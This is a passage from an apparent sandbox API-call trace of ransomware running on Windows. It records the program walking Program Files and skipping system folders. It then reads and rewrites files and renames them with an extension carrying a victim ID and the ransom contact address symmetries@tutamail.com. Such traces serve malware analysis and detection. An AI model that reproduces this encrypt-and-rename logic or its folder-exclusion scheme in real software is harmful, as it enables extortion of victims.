lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqlxmlx.dll", lpUsedDefaultChar=0x0) returned 11 [0069.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0069.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0069.350] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43854cb5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43854cb5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43854cb5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="sqlxmlx.rll", cAlternateFileName="")) returned 1 [0069.350] lstrcmpiW (lpString1="sqlxmlx.rll", lpString2=".") returned 1 [0069.350] lstrcmpiW (lpString1="sqlxmlx.rll", lpString2="..") returned 1 [0069.350] lstrcmpiW (lpString1="sqlxmlx.rll", lpString2="...") returned 1 [0069.350] lstrcmpiW (lpString1="sqlxmlx.rll", lpString2="windows") returned -1 [0069.350] lstrcmpiW (lpString1="sqlxmlx.rll", lpString2="recovery") returned 1 [0069.350] lstrcmpiW (lpString1="sqlxmlx.rll", lpString2="perflogs") returned 1 [0069.350] lstrcmpiW (lpString1="sqlxmlx.rll", lpString2="documents and settings") returned 1 [0069.351] lstrcmpiW (lpString1="sqlxmlx.rll", lpString2="$RECYCLE.BIN") returned 1 [0069.351] lstrcmpiW (lpString1="sqlxmlx.rll", lpString2="system volume information") returned -1 [0069.351] lstrcmpiW (lpString1="sqlxmlx.rll", lpString2="msocache") returned 1 [0069.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqlxmlx.rll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqlxmlx.rll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqlxmlx.rll", lpUsedDefaultChar=0x0) returned 11 [0069.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqlxmlx.rll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqlxmlx.rll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqlxmlx.rll", lpUsedDefaultChar=0x0) returned 11 [0069.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0069.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0069.351] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.352] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9167624875315808) returned 0 [0069.352] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.352] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.352] CloseHandle (hObject=0xffffffff) returned 1 [0069.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0069.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0069.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0069.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0069.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0069.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ede0 [0069.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.352] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll"), lpNewFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0069.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0069.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0069.353] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43854cb5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43854cb5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43854cb5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="sqlxmlx.rll", cAlternateFileName="")) returned 0 [0069.353] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0069.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0069.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0069.354] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440d35a9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440d35a9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440d35a9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd0a00, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0069.354] lstrcmpiW (lpString1="wab32.dll", lpString2=".") returned 1 [0069.354] lstrcmpiW (lpString1="wab32.dll", lpString2="..") returned 1 [0069.354] lstrcmpiW (lpString1="wab32.dll", lpString2="...") returned 1 [0069.354] lstrcmpiW (lpString1="wab32.dll", lpString2="windows") returned -1 [0069.354] lstrcmpiW (lpString1="wab32.dll", lpString2="recovery") returned 1 [0069.354] lstrcmpiW (lpString1="wab32.dll", lpString2="perflogs") returned 1 [0069.354] lstrcmpiW (lpString1="wab32.dll", lpString2="documents and settings") returned 1 [0069.354] lstrcmpiW (lpString1="wab32.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.354] lstrcmpiW (lpString1="wab32.dll", lpString2="system volume information") returned 1 [0069.354] lstrcmpiW (lpString1="wab32.dll", lpString2="msocache") returned 1 [0069.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0069.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wab32.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wab32.dll", cchWideChar=9, lpMultiByteStr=0x345f2a8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wab32.dll", lpUsedDefaultChar=0x0) returned 9 [0069.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0069.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wab32.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wab32.dll", cchWideChar=9, lpMultiByteStr=0x345f278, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wab32.dll", lpUsedDefaultChar=0x0) returned 9 [0069.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0069.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0069.354] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440d35a9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440d35a9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440d35a9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xeb600, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="wab32res.dll", cAlternateFileName="")) returned 1 [0069.354] lstrcmpiW (lpString1="wab32res.dll", lpString2=".") returned 1 [0069.354] lstrcmpiW (lpString1="wab32res.dll", lpString2="..") returned 1 [0069.354] lstrcmpiW (lpString1="wab32res.dll", lpString2="...") returned 1 [0069.355] lstrcmpiW (lpString1="wab32res.dll", lpString2="windows") returned -1 [0069.355] lstrcmpiW (lpString1="wab32res.dll", lpString2="recovery") returned 1 [0069.355] lstrcmpiW (lpString1="wab32res.dll", lpString2="perflogs") returned 1 [0069.355] lstrcmpiW (lpString1="wab32res.dll", lpString2="documents and settings") returned 1 [0069.355] lstrcmpiW (lpString1="wab32res.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.355] lstrcmpiW (lpString1="wab32res.dll", lpString2="system volume information") returned 1 [0069.355] lstrcmpiW (lpString1="wab32res.dll", lpString2="msocache") returned 1 [0069.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0069.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wab32res.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wab32res.dll", cchWideChar=12, lpMultiByteStr=0x345f2a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wab32res.dll", lpUsedDefaultChar=0x0) returned 12 [0069.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0069.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wab32res.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wab32res.dll", cchWideChar=12, lpMultiByteStr=0x345f278, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wab32res.dll", lpUsedDefaultChar=0x0) returned 12 [0069.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0069.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0069.355] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440d35a9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440d35a9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440d35a9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xeb600, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="wab32res.dll", cAlternateFileName="")) returned 0 [0069.355] FindClose (in: hFindFile=0x231c80 | out: hFindFile=0x231c80) returned 1 [0069.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0069.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0069.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0069.356] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x231c6a, cFileName="System", cAlternateFileName="")) returned 0 [0069.356] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0069.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0069.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0069.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0069.356] FindNextFileW (in: hFindFile=0x231fc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1a307d95, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5d0779b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5d0779b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0069.356] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0069.356] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0069.356] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0069.356] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0069.356] lstrcmpiW (lpString1="desktop.ini", lpString2="recovery") returned -1 [0069.356] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0069.356] lstrcmpiW (lpString1="desktop.ini", lpString2="documents and settings") returned -1 [0069.356] lstrcmpiW (lpString1="desktop.ini", lpString2="$RECYCLE.BIN") returned 1 [0069.356] lstrcmpiW (lpString1="desktop.ini", lpString2="system volume information") returned -1 [0069.356] lstrcmpiW (lpString1="desktop.ini", lpString2="msocache") returned -1 [0069.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x345f978, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0069.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x345f948, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0069.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0069.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0069.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0069.357] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0069.357] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=174) returned 1 [0069.357] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0069.357] ReadFile (in: hFile=0x450, lpBuffer=0x23db18, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x23db18*, lpNumberOfBytesRead=0x345f63c*=0xa0, lpOverlapped=0x0) returned 1 [0069.357] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.357] WriteFile (in: hFile=0x450, lpBuffer=0x23db18*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x23db18*, lpNumberOfBytesWritten=0x345f638*=0xa0, lpOverlapped=0x0) returned 1 [0069.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0069.358] CloseHandle (hObject=0x450) returned 1 [0069.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0069.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0069.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0069.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0069.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225c30 [0069.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0069.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0069.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225c30 | out: hHeap=0x1e0000) returned 1 [0069.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.358] MoveFileW (lpExistingFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), lpNewFileName="C:\\Program Files\\desktop.ini.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\desktop.ini.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0069.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0069.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0069.359] FindNextFileW (in: hFindFile=0x231fc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d83195, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0069.359] lstrcmpiW (lpString1="Internet Explorer", lpString2=".") returned 1 [0069.359] lstrcmpiW (lpString1="Internet Explorer", lpString2="..") returned 1 [0069.359] lstrcmpiW (lpString1="Internet Explorer", lpString2="...") returned 1 [0069.359] lstrcmpiW (lpString1="Internet Explorer", lpString2="windows") returned -1 [0069.359] lstrcmpiW (lpString1="Internet Explorer", lpString2="recovery") returned -1 [0069.359] lstrcmpiW (lpString1="Internet Explorer", lpString2="perflogs") returned -1 [0069.359] lstrcmpiW 